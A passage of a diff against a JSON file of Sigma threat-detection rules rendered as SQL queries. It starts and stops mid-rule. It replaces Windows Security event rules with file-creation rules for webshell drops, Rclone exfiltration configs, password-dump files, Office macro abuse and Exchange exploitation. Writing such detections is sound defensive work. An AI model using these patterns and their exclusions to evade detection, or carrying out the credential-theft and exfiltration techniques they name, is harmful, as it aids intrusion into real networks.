OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (NewProcessName = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + "filename": "file_event_win_webshell_creation_detect.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Registry", - "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "title": "Rclone Config File Creation", + "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects Rclone config file being created", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate Rclone usage (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" ], - "filename": "win_security_dot_net_etw_tamper.yml" + "filename": "file_event_win_rclone_exec_file.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Security", - "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Wmiprvse Wbemcomn DLL Hijack - File", + "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "status": "test", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "User with Privileges Logon", - "id": "94309181-d345-4cbf-b5fe-061769bdf9cb", + "title": "Suspicious PFX File Creation", + "id": "dca1b3e8-e043-4ec8-85d7-867f334b5724", + "status": "test", + "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ], + "falsepositives": [ + "System administrators managing certififcates." + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.pfx' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%\\\\Templates\\\\Windows\\\\Windows\\_TemporaryKey.pfx%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\CMake\\\\%' ESCAPE '\\')))" + ], + "filename": "file_event_win_susp_pfx_file_creation.yml" + }, + { + "title": "Creation In User Word Startup Folder", + "id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", "status": "experimental", - "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", + "description": "Detects the creation of an file in user Word Startup", "author": "frack113", + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ], "falsepositives": [ - "Unknown" + "Addition of legitimate plugins" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4672', '4964') AND NOT (SubjectUserSid = 'S-1-5-18'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\STARTUP\\\\%' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotx' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.docb' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.wll' ESCAPE '\\' OR TargetFilename LIKE '%.wwl' ESCAPE '\\')))" ], - "filename": "win_security_admin_logon.yml" + "filename": "file_event_win_office_winword_startup.yml" }, { - "title": "Reconnaissance Activity", - "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", - "status": "test", - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "title": "Suspicious Word Cab File Write CVE-2021-40444", + "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "status": "experimental", + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "author": "Florian Roth (Nextron Systems), Sittikorn S", "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ - "Administrator activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" ], - "filename": "win_security_susp_net_recon_activity.yml" + "filename": "file_event_win_winword_cve_2021_40444.yml" }, { - "title": "First Time Seen Remote Named Pipe", - "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "title": "Hijack Legit RDP Session to Move Laterally", + "id": "52753ea4-b3a0-4365-910d-36cff487b789", "status": "test", - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", "author": "Samir Bousseaden", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" ], - "filename": "win_security_lm_namedpipe.yml" + "filename": "file_event_win_tsclient_filewrite_startup.yml" }, { - "title": "Possible PetitPotam Coerce Authentication Attempt", - "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", + "title": "Created Files by Office Applications", + "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", "status": "experimental", - "description": "Detect PetitPotam coerced authentication activity.", - "author": "Mauricio Velazco, Michael Haag", + "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.t1204.002", + "attack.execution" ], "falsepositives": [ - "Unknown. Feedback welcomed." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" ], - "filename": "win_security_petitpotam_network_share.yml" + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" }, { - "title": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", - "id": "f63508a0-c809-4435-b3be-ed819394d612", - "status": "test", - "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "title": "Office Macro File Creation From Suspicious Process", + "id": "b1c50487-1967-4315-a026-6491686d860e", + "status": "experimental", + "description": "Detects the creation of a office macro file from a a suspicious process", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4673' AND PrivilegeList = 'SeLoadDriverPrivilege' AND Service = '-') AND NOT (((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\fltMC.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\HelpPane.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\mmc.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wimserv.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR ((ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": "win_security_user_driver_loaded.yml" + "filename": "file_event_win_office_macro_files_from_susp_process.yml" }, { - "title": "Persistence and Execution at Scale via GPO Scheduled Task", - "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", - "status": "test", - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "author": "Samir Bousseaden", + "title": "Suspicious DotNET CLR Usage Log Artifact", + "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "status": "experimental", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" ], - "filename": "win_security_gpo_scheduledtasks.yml" + "filename": "file_event_win_net_cli_artefact.yml" }, { - "title": "Hacktool Ruler", - "id": "24549159-ac1b-479c-8175-d42aea947cae", + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "status": "test", - "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "description": "Detects a dump file written by QuarksPwDump password dumper", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Go utilities that use staaldraad awesome NTLM library" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" ], - "filename": "win_security_alert_ruler.yml" + "filename": "file_event_win_hktl_quarkspw_filedump.yml" }, { - "title": "SMB Create Remote File Admin Share", - "id": "b210394c-ba12-4f89-9117-44a2464b9511", + "title": "CVE-2021-26858 Exchange Exploitation", + "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "status": "test", - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "author": "Bhabesh Raj", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1203", + "attack.execution", + "cve.2021.26858" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" ], - "filename": "win_security_smb_file_creation_admin_shares.yml" + "filename": "file_event_win_cve_2021_26858_msexchange.yml" }, { - "title": "NetNTLM Downgrade Attack", - "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", - "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "PSEXEC Remote Execution File Artefact", + "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", + "status": "experimental", + "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.execution", + "attack.persistence", + "attack.t1136.002", + "attack.t1543.003", + "attack.t1570", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" ], - "filename": "win_security_net_ntlm_downgrade.yml" + "filename": "file_event_win_psexec_service_key.yml" }, { - "title": "Active Directory Replication from Non Machine Account", - "id": "17d619c1-e020-4347-957e-1d1207455c93", + "title": "GoToAssist Temporary Installation Artefact", + "id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", "status": "test", - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\LogMeInInc\\\\GoToAssist Remote Support Expert\\\\%' ESCAPE '\\'" ], - "filename": "win_security_ad_replication_non_machine_account.yml" + "filename": "file_event_win_gotoopener_artefact.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - Security", - "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "title": "Suspicious ASPX File Drop by Exchange", + "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + "filename": "file_event_win_exchange_webshell_drop.yml" }, { - "title": "WCE wceaux.dll Access", - "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", - "status": "test", - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "author": "Thomas Patzke", + "title": "Suspicious File Creation In Uncommon AppData Folder", + "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "status": "experimental", + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 